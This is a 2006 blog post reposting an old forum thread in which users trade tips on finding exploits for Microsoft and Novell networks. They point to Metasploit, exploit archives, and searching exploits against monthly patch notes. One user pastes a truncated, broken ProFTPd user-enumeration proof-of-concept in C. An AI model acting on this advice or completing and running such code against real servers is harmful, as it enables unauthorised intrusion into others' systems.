dimanche 5 février 2006

metasploit copy and paste


Source de l'info: (Merci)
http://www.jinx.com/forum/post.asp?method=ReplyQuote&REPLY_ID=233444&TOPIC_ID=42293&FORUM_ID=17





Posted - 11/07/2005 : 10:17:21 PM

what are some good places to look for exploits on microsoft networks and novell client
9 L A T E S T R E P L I E S (Newest First)
MalevolenTsunami Posted - 11/11/2005 : 05:30:45 AM
You have to compile it, with a compiler. And an exploit won't do you a whole lot of good without a payload ;).

www.InformationLeak.net
cashmoney Posted - 11/10/2005 : 9:48:21 PM
who helped you find that...i can't believe you found a reeaal exploit code
rofl
sakuramboo Posted - 11/10/2005 : 3:10:16 PM
little kids shouldnt be messing around with grown up toys.

I know nothing. I know nothing.
Broady_3 Posted - 11/10/2005 : 1:46:09 PM
How do U run the exploit code I've got one (post after) but I can't run it? Can anyone help?

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic <ljuranic@lss.hr> // http://www.lss.hr

#include
#include
#include
#include
#include

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploit\n"
" Coded by Leon / LSS Security\n"
">-------------------------------------<\n"); if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y
nonsence Posted - 11/09/2005 : 11:41:09 PM
http://packetstormsecurity.org/

http://www.securiteam.com/exploits/

MCP, Network+ Certified
droby10 Posted - 11/08/2005 : 2:29:16 PM
msdn.
nonsence Posted - 11/08/2005 : 09:43:23 AM
wait every month until microsoft issues their security patch reports, (might also wanna get on the mailing list). and then use google to search for exploits to the patches they are issueing. at best, you might find sample code of the exploit. and then plug it into metaexploit or just run it yourself after you compile it

MCP, Network+ Certified
sakuramboo Posted - 11/07/2005 : 10:41:02 PM
depends on the service.

google is your best bet.

I know nothing. I know nothing.
Warbeast Posted - 11/07/2005 : 10:26:30 PM
You could download Metaspoilt Framework.

http://www.metasploit.com

Hacking tutorial for beginners

http://www.jinx.com/forum/topic.asp?TOPIC_ID=42051

Aucun commentaire:

Enregistrer un commentaire

Votre commentaire constructif ( ou pas ! )

Archives du blog

Pages

Membres